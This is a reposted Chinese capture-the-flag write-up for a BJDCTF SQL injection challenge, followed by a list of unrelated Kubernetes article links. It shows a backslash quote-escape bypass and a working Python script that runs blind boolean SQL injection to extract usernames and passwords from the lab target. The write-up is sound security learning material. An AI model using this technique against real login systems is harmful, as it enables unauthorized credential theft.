[BJDCTF 2nd]简单注入
本文共 1388 字,大约阅读时间需要 4 分钟。
- 访问robots.txt,得到hint.php,得到sql注入的源码
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
- 一开始尝试了一些
'闭合
- okkk!
'被过滤了 - 那就从这个sql语句入手想想办法
- 记得以前学过一个addslashes()函数利用\去转义,看看效果
select * from users where username='123\' and password='union select 1,2,3#';
- okkkk! union 这些应该也被过滤了
- 尝试一下or 这个时候语句就是
select * from users where username='123\' and password='or 1#';
- 页面返回
BJD needs to be stronger
- 这样看来应该就是注入成功了 比较简单的注入题目了
- 直接写脚本
import requestsimport timeurl = "http://28c73fa1-00c6-4fe9-a54a-08730ca346ad.node3.buuoj.cn/"def Get_Flag(url): Flag = "" for i in range(1,30): Max = 128 Min = 32 Mid = (Max+Min)//2 while Min < Max: time.sleep(0.5) # payload = "or ascii(substr(database(),%d,1))>%d#"%(i,Mid) payload = 'or ascii(substr((username),{},1))>{}#'.format(i,Mid) # payload = 'or ascii(substr((password),{},1))>{}#'.format(i,Mid) data = { "username":"123\\","password":payload} r = requests.post(url=url,data=data) if "stronger" in r.text: Min=Mid+1 pass else: Max=Mid pass Mid = (Max+Min)//2 if (Min==32 or Max==128): print('break') break Flag = Flag + chr(Mid) print(Flag)Get_Flag(url) - 用户名admin
- 得到flag
- 吐槽一下 我没fuzz代码写完才发现
=后也被过滤了 下次一定要注意
转载地址:http://gywmf.baihongyu.com/
你可能感兴趣的文章
Ceph 故障排查笔记 | 万字经验总结
查看>>
使用 Go 从零开始实现 CNI 可还行?
查看>>
KubeSphere 3.1.0 GA:混合多云走向边缘,让应用无处不在
查看>>
Containerd 1.5 发布:重磅支持 docker-compose!
查看>>
基于 Kubernetes 的 Spring Could 微服务 CI/CD 实践
查看>>
5.15 相约上海!2021 年度首届云原生 Meetup | KubeSphere & Friends
查看>>
使用 Cilium 作为网络插件部署 K8s + KubeSphere
查看>>
万变不离其宗,性能优化也有章可循
查看>>
别再乱用 Prometheus 联邦了,分享一个 Prometheus 高可用新方案
查看>>
Litmus 实践:让群魔在混沌中乱舞,看 K8s 能撑到何时
查看>>
Prometheus 存储层的演进
查看>>
Kubernetes 边缘节点抓不到监控指标?试试这个方法!
查看>>
不对全文内容进行索引的 Loki 到底优秀在哪里
查看>>
太强大了!这些 Go 的难点问题都能解决!
查看>>
万字长文:K8s 创建 pod 时,背后到底发生了什么?
查看>>
后云原生时代,Kubernetes:你看我还有机会吗?
查看>>
Wintun:一款惊艳的 WireGuard 虚拟网卡接口驱动
查看>>
个人学习方法分享
查看>>
时隔多年。。终于有一款云原生消息系统出仕了!
查看>>
[译]数据包在 Kubernetes 中的一生(1)
查看>>